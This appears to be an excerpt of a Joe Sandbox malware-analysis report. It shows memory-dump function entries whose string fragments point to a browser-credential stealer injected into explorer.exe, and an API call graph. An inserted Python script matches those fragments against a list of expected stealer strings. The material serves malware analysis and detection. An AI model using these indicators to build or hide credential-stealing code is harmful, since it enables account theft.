                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $.$e$n$v
                                                                                                                                                                                                        • API String ID: 0-1849617553
                                                                                                                                                                                                        • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction ID: c7a357e072c6822e39771978a03b79fefaf6207f251c348336a23ba7e04dafd8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2671B135618B498FD718DFA8C4847AAB7F1FF98304F00062ED45AC7221EF72E9458B86
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                        • API String ID: 0-1970020201
                                                                                                                                                                                                        • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction ID: 05c8fe2be11a074286b7d018b237fcc462128cd5621dac17d0aad025c628f3c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7514FB0918B4D8FDB54DFA4C045AEEB7F1FF68304F40462E989AE7254EF70A5418B89
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                        • API String ID: 0-1970020201
                                                                                                                                                                                                        • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction ID: d69659543e1194ee97ef3df69ec1b250576ea78bca0b7bb35656d24073058e0b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA513BB0918B4D8BDB64DFA4C045AEEB7E1FF58304F40462E959AE7214EF70A5418B89
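The String ID fields in these function entries list fragments such as shel, l32. and dll, or User, name, Pass and word: four-byte pieces whose shape is consistent with a routine that writes a string one 32-bit immediate at a time onto the stack. Joe Sandbox de-duplicates and sorts the fragments, so the write order is gone and one dll fragment may belong to several strings. The script below is an added example, not Joe Sandbox code and not code from the sample; it checks an analyst-supplied expectation list against such a field, allowing for a string that starts mid-DWORD and for a short final chunk the string extractor did not list. The DWORD-chunk model, the EXPECTED list and the constructed SAMPLE_STRING_IDS (copied from the String ID values in this section) are assumptions of the example.

```python
"""Match Joe Sandbox 'String ID' fragments against expected stack strings.

Added example for this report page; not Joe Sandbox code. The DWORD-chunk
model and the expectation list are assumptions of the example.
"""
from __future__ import annotations

from dataclasses import dataclass

CHUNK = 4  # assumption: strings are written one 32-bit immediate at a time

# Constructed input: String ID values as they appear in this section. The
# report separates fragments with '$', de-duplicates and sorts them, so the
# write order is lost and one 'dll' may serve several strings.
SAMPLE_STRING_IDS = [
    "4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi",
    "UR$2$L: $Pass$User$name$word",
    "2.dl$dll$l32.$ole3$shel",
    "4$\\$dll$ion.$vers",
]

# Assumption: strings an analyst expects a browser-credential stealer to
# build at runtime. Extend this list for the family under analysis.
EXPECTED = [
    "nspr4.dll", "sspicli.dll", "shell32.dll", "ole32.dll", "version.dll",
    "dragon_s.dll", "opera_browser.dll", "nss3.dll", "kernel32.dll",
    "Username", "Password", "URL: ",
]


def chunkify(s: str, offset: int = 0, chunk: int = CHUNK) -> list[str]:
    """Split `s` as a DWORD-at-a-time writer would emit it when the string
    starts `offset` bytes into its first DWORD (0 = aligned start)."""
    head = chunk - offset
    parts = [s[:head]] + [s[i:i + chunk] for i in range(head, len(s), chunk)]
    return [p for p in parts if p]


@dataclass(frozen=True)
class Match:
    target: str
    status: str        # "whole", "full" or "partial" (only the short tail missing)
    offset: int        # byte offset of the string's start within its first DWORD
    used: frozenset    # fragments explained by this match


def match_fragments(string_id: str, expected=EXPECTED, chunk: int = CHUNK):
    """Return (matches, leftovers) for one String ID field.

    A target is 'full' when, for some start offset, every chunk it would be
    written as is present. It is 'partial' when only its final, short chunk
    is absent: string extractors usually ignore one- or two-byte runs, so
    that tail is often simply not listed. Fragments no target explains are
    returned so the analyst can see what the expectation list misses.
    """
    fragments = set(string_id.split("$"))
    matches: list[Match] = []
    for target in expected:
        if target in fragments:
            matches.append(Match(target, "whole", 0, frozenset({target})))
            continue
        layouts = [(o, chunkify(target, o, chunk)) for o in range(chunk)]
        full = next(((o, p) for o, p in layouts
                     if all(x in fragments for x in p)), None)
        if full:
            o, p = full
            matches.append(Match(target, "full", o, frozenset(p)))
            continue
        partial = next(((o, p) for o, p in layouts
                        if len(p) >= 2 and len(p[-1]) < chunk
                        and all(x in fragments for x in p[:-1])), None)
        if partial:
            o, p = partial
            matches.append(Match(target, "partial", o, frozenset(p[:-1])))
    consumed = set().union(*(m.used for m in matches))
    return matches, sorted(fragments - consumed)


def match_all(string_ids=SAMPLE_STRING_IDS):
    """Run the matcher over every constructed String ID field."""
    return {sid: match_fragments(sid) for sid in string_ids}


if __name__ == "__main__":
    for sid, (matches, rest) in match_all().items():
        print(sid)
        for m in matches:
            print(f"  {m.status:<7} {m.target!r} (offset {m.offset})")
        if rest:
            print(f"  unexplained fragments: {rest}")
```

Run on the four fields, the matcher reports URL: only at offset 2, which says the label does not start on a DWORD boundary in the buffer the sample builds, and reports ole32.dll as partial because the one-byte tail l is not listed in that field even though the same tail is listed for nspr4.dll in another. The fragments 2, 4 and \ remain unexplained by this expectation list; they are the places where a reverser would go back to the disassembly rather than guess.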
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                                        • API String ID: 0-1610437797
                                                                                                                                                                                                        • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction ID: 7f8b29de8e0cd0136b4fadf65227fe3d9c2a056b0862e5c917023fda409626fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C41A234A28B4D8FDB65EF689845BEAB7E4FB98305F40462E984EC7240EF31D5058782
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                                        • API String ID: 0-1610437797
                                                                                                                                                                                                        • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction ID: 38c8e5a8c7006d29320d63d92ab7ecff385926f3ab32ec2b0f2e72fd08effc03
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B41A034219B8D8FDBA5EF28C8457EAB7E1FB98305F40462E999EC7240EF31D5458782
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                                        • API String ID: 0-327345718
                                                                                                                                                                                                        • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction ID: 709007ede93699aeee9de34d367a9ba2e04b19dcc580a3325b969df8b455e13a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97415930A18F8E8FCF94EF6880957AD77E1FF68304F90016AE80ED7254DA71D9408B82
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                                        • API String ID: 0-327345718
                                                                                                                                                                                                        • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction ID: 6fee9a5ed51f281f46affc574f420aeba10626a66d50677914788b9563efe9f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0418F31A19F0D8FDB48EF68C0957AD77E2FB68304F51096AE80ED7210DA72D5408BC6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$el32$h$kern
                                                                                                                                                                                                        • API String ID: 0-4264704552
                                                                                                                                                                                                        • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction ID: ecfd54ce8f2ac36404fe5060d9989200145bf53401baee58da0a80ebddd2a8e1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A418570A08B498FDB55DF2880983AABBE1FB98304F50466F989EC7255DF70D545CB42
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$el32$h$kern
                                                                                                                                                                                                        • API String ID: 0-4264704552
                                                                                                                                                                                                        • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction ID: bb562c377aa4104eb938a8e5e98e9d7b111a656f91bb45654773084b82579e86
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61418F70608B498FD7A9DF2884843ABBBE1FB98304F104A2ED59EC3265DF71D545CB85
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction ID: bc202cc2accb8d614e75240ea70cac153553853c7eca4aa35e10afc627ebff72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3731247590DB885FD71ADB28C4886EABBD0FB94300F50491EE49BC7252EE31B50ACB43
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction ID: e28a503e6afec3cf95a9beecaef47ee55db9f8c636d0d7ed11849644541b445d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7331227551DB88AFD71ADF28C0846DAB7D1FB84300F50491EE49BC7291EE32A64ACB47
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                        • Instruction ID: 402d45dc7457f5455e374204ca9050c15d72c0217153d96a8a05eefe02603072
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9131E17590DB486FD719DB28C4846EAB7D4FB94300F40491EE49BC3255EE31E50ACB43
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                                        • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                        • Instruction ID: e2c8e4ab672b1e1f80ac26b91e6b6288139d79b5bca0e3684e6f780d6814ad49
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE217C74A24F0E9FDB04EFA8D0447ADBAF1FB58314F50462ED009D3610DB79A591CB88
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                                        • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                        • Instruction ID: 444ea47870cf972a6c4db767774a8597455e7f8efc43c40884d5df1eed35c6b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A215C75A24F0E9BDB04EFA8D0447E9BBF1FB58314F50462DD049D3610DB79A5918B88
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: auth$logi$pass$user
                                                                                                                                                                                                        • API String ID: 0-2393853802
                                                                                                                                                                                                        • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction ID: 5e83fbdb09a5e6c37d9dba8322f3c0e14595f73a0642f8683e64567fb51b3584
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E21C070A14B0D8BCB05CF9A98806DEB7E1EF88344F01461DE40ADB344D7B0E9148BC6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: auth$logi$pass$user
                                                                                                                                                                                                        • API String ID: 0-2393853802
                                                                                                                                                                                                        • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction ID: 4402756704d9e6dead8c72b77e41126b83060b70d29a0aefd287dc478976df94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1821C070614B0D8BCB05CF9998906DEBBE2EF88344F004619E40AEB244D7B5E955CBCA

Execution Graph

Execution Coverage: 1.8%
Dynamic/Decrypted Code Coverage: 2%
Signature Coverage: 0%
Total number of Nodes: 602
Total number of Limit Nodes: 77
                                                                                                                                                                                                        execution_graph 91270 3019080 91271 30190a4 91270->91271 91276 30190bb 91271->91276 91281 301bd40 91271->91281 91272 3019113 91273 3019120 Sleep 91272->91273 91278 301919c 91272->91278 91293 3018ca0 LdrLoadDll 91272->91293 91294 3018eb0 LdrLoadDll 91272->91294 91273->91272 91276->91272 91276->91278 91284 300acf0 91276->91284 91288 3014e50 91276->91288 91295 301a540 91281->91295 91283 301bd6d 91283->91276 91285 300ad14 91284->91285 91286 300ad50 LdrLoadDll 91285->91286 91287 300ad1b 91285->91287 91286->91287 91287->91276 91289 3014e5e 91288->91289 91291 3014e6a 91288->91291 91289->91291 91302 30152d0 LdrLoadDll 91289->91302 91291->91276 91292 3014fbc 91292->91276 91293->91272 91294->91272 91296 301a55c NtAllocateVirtualMemory 91295->91296 91298 301af60 91295->91298 91296->91283 91299 301af70 91298->91299 91301 301af92 91298->91301 91300 3014e50 LdrLoadDll 91299->91300 91300->91301 91301->91296 91302->91292 91303 301f13d 91306 301b9d0 91303->91306 91307 301b9f6 91306->91307 91308 301ba02 91307->91308 91314 3009d40 91307->91314 91310 301ba26 91308->91310 91322 3008f30 91308->91322 91360 301a6b0 91310->91360 91363 3009c90 91314->91363 91316 3009d4d 91317 3009d54 91316->91317 91375 3009c30 91316->91375 91317->91308 91323 3008f57 91322->91323 91773 300b1c0 91323->91773 91325 3008f69 91777 300af10 91325->91777 91327 3008f86 91334 3008f8d 91327->91334 91848 300ae40 LdrLoadDll 91327->91848 91329 30090f2 91329->91310 91331 3008ffc 91793 300f410 91331->91793 91333 3009006 91333->91329 91335 301bf90 2 API calls 91333->91335 91334->91329 91781 300f380 91334->91781 91336 300902a 91335->91336 91337 301bf90 2 API calls 91336->91337 91338 300903b 91337->91338 91339 301bf90 2 API calls 91338->91339 91340 300904c 91339->91340 91805 300ca90 91340->91805 91342 3009059 91343 3014a50 8 API 
calls 91342->91343 91344 3009066 91343->91344 91345 3014a50 8 API calls 91344->91345 91346 3009077 91345->91346 91347 3009084 91346->91347 91348 30090a5 91346->91348 91815 300d620 91347->91815 91349 3014a50 8 API calls 91348->91349 91357 30090c1 91349->91357 91352 30090e9 91355 3008d00 23 API calls 91352->91355 91354 3009092 91831 3008d00 91354->91831 91355->91329 91357->91352 91849 300d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 91357->91849 91361 301a6cf 91360->91361 91362 301af60 LdrLoadDll 91360->91362 91362->91361 91394 3018bc0 91363->91394 91367 3009cb6 91367->91316 91368 3009cac 91368->91367 91401 301b2b0 91368->91401 91370 3009cf3 91370->91367 91372 3009d13 91370->91372 91412 3009ab0 91370->91412 91418 3009620 LdrLoadDll 91372->91418 91374 3009d25 91374->91316 91752 301b5a0 91375->91752 91378 301b5a0 LdrLoadDll 91379 3009c5b 91378->91379 91380 3009c71 91379->91380 91381 301b5a0 LdrLoadDll 91379->91381 91382 300f180 91380->91382 91381->91380 91383 300f199 91382->91383 91756 300b040 91383->91756 91385 300f1ac 91760 301a1e0 91385->91760 91389 300f1d2 91392 300f1fd 91389->91392 91766 301a260 91389->91766 91391 301a490 2 API calls 91393 3009d65 91391->91393 91392->91391 91393->91308 91395 3018bcf 91394->91395 91396 3014e50 LdrLoadDll 91395->91396 91397 3009ca3 91396->91397 91398 3018a70 91397->91398 91419 301a600 91398->91419 91402 301b2c9 91401->91402 91422 3014a50 91402->91422 91404 301b2e1 91405 301b2ea 91404->91405 91461 301b0f0 91404->91461 91405->91370 91407 301b2fe 91407->91405 91479 3019f00 91407->91479 91409 301b332 91409->91409 91484 301bdc0 91409->91484 91415 3009aca 91412->91415 91730 3007ea0 91412->91730 91414 3009ad1 91414->91372 91415->91414 91743 3008160 91415->91743 91418->91374 91420 301af60 LdrLoadDll 91419->91420 91421 3018a85 91420->91421 91421->91368 91423 3014d85 91422->91423 91424 3014a64 91422->91424 91423->91404 91424->91423 91487 3019c50 91424->91487 91427 3014b90 91490 301a360 91427->91490 91428 3014b73 91547 301a460 
LdrLoadDll 91428->91547 91431 3014b7d 91431->91404 91432 3014bb7 91433 301bdc0 2 API calls 91432->91433 91435 3014bc3 91433->91435 91434 3014d49 91437 301a490 2 API calls 91434->91437 91435->91431 91435->91434 91436 3014d5f 91435->91436 91442 3014c52 91435->91442 91556 3014790 LdrLoadDll NtReadFile NtClose 91436->91556 91438 3014d50 91437->91438 91438->91404 91440 3014d72 91440->91404 91441 3014cb9 91441->91434 91443 3014ccc 91441->91443 91442->91441 91444 3014c61 91442->91444 91549 301a2e0 91443->91549 91446 3014c66 91444->91446 91447 3014c7a 91444->91447 91548 3014650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 91446->91548 91448 3014c97 91447->91448 91449 3014c7f 91447->91449 91448->91438 91505 3014410 91448->91505 91493 30146f0 91449->91493 91452 3014c70 91452->91404 91455 3014c8d 91455->91404 91457 3014d2c 91553 301a490 91457->91553 91459 3014caf 91459->91404 91460 3014d38 91460->91404 91463 301b101 91461->91463 91462 301b113 91462->91407 91463->91462 91464 301bd40 2 API calls 91463->91464 91465 301b134 91464->91465 91574 3014070 91465->91574 91467 301b180 91467->91407 91468 301b157 91468->91467 91469 3014070 3 API calls 91468->91469 91471 301b179 91469->91471 91471->91467 91606 3015390 91471->91606 91472 301b20a 91473 301b21a 91472->91473 91700 301af00 LdrLoadDll 91472->91700 91616 301ad70 91473->91616 91476 301b248 91695 3019ec0 91476->91695 91478 301b272 91478->91407 91478->91478 91480 301af60 LdrLoadDll 91479->91480 91481 3019f1c 91480->91481 91723 51f2b2a 91481->91723 91482 3019f37 91482->91409 91485 301b359 91484->91485 91726 301a670 91484->91726 91485->91370 91488 301af60 LdrLoadDll 91487->91488 91489 3014b44 91488->91489 91489->91427 91489->91428 91489->91431 91491 301af60 LdrLoadDll 91490->91491 91492 301a37c NtCreateFile 91491->91492 91492->91432 91494 301470c 91493->91494 91495 301a2e0 LdrLoadDll 91494->91495 91496 301472d 91495->91496 91497 3014734 91496->91497 91498 3014748 91496->91498 91499 301a490 2 API calls 91497->91499 91500 
301a490 2 API calls 91498->91500 91502 301473d 91499->91502 91501 3014751 91500->91501 91557 301bfd0 LdrLoadDll RtlAllocateHeap 91501->91557 91502->91455 91504 301475c 91504->91455 91506 301445b 91505->91506 91507 301448e 91505->91507 91508 301a2e0 LdrLoadDll 91506->91508 91509 30145d9 91507->91509 91513 30144aa 91507->91513 91510 3014476 91508->91510 91511 301a2e0 LdrLoadDll 91509->91511 91512 301a490 2 API calls 91510->91512 91521 30145f4 91511->91521 91514 301447f 91512->91514 91515 301a2e0 LdrLoadDll 91513->91515 91514->91459 91516 30144c5 91515->91516 91517 30144e1 91516->91517 91518 30144cc 91516->91518 91520 30144e6 91517->91520 91529 30144fc 91517->91529 91519 301a490 2 API calls 91518->91519 91524 30144d5 91519->91524 91525 301a490 2 API calls 91520->91525 91570 301a320 LdrLoadDll 91521->91570 91523 301462e 91526 301a490 2 API calls 91523->91526 91524->91459 91527 30144ef 91525->91527 91530 3014639 91526->91530 91527->91459 91528 3014501 91534 3014513 91528->91534 91561 301a410 91528->91561 91529->91528 91558 301bf90 91529->91558 91530->91459 91533 3014567 91535 301457e 91533->91535 91569 301a2a0 LdrLoadDll 91533->91569 91534->91459 91537 3014585 91535->91537 91538 301459a 91535->91538 91539 301a490 2 API calls 91537->91539 91540 301a490 2 API calls 91538->91540 91539->91534 91541 30145a3 91540->91541 91542 30145cf 91541->91542 91564 301bb90 91541->91564 91542->91459 91544 30145ba 91545 301bdc0 2 API calls 91544->91545 91546 30145c3 91545->91546 91546->91459 91547->91431 91548->91452 91550 301af60 LdrLoadDll 91549->91550 91551 3014d14 91550->91551 91552 301a320 LdrLoadDll 91551->91552 91552->91457 91554 301a4ac NtClose 91553->91554 91555 301af60 LdrLoadDll 91553->91555 91554->91460 91555->91554 91556->91440 91557->91504 91571 301a630 91558->91571 91560 301bfa8 91560->91528 91562 301af60 LdrLoadDll 91561->91562 91563 301a42c NtReadFile 91562->91563 91563->91533 91565 301bbb4 91564->91565 91566 301bb9d 91564->91566 91565->91544 91566->91565 91567 301bf90 2 
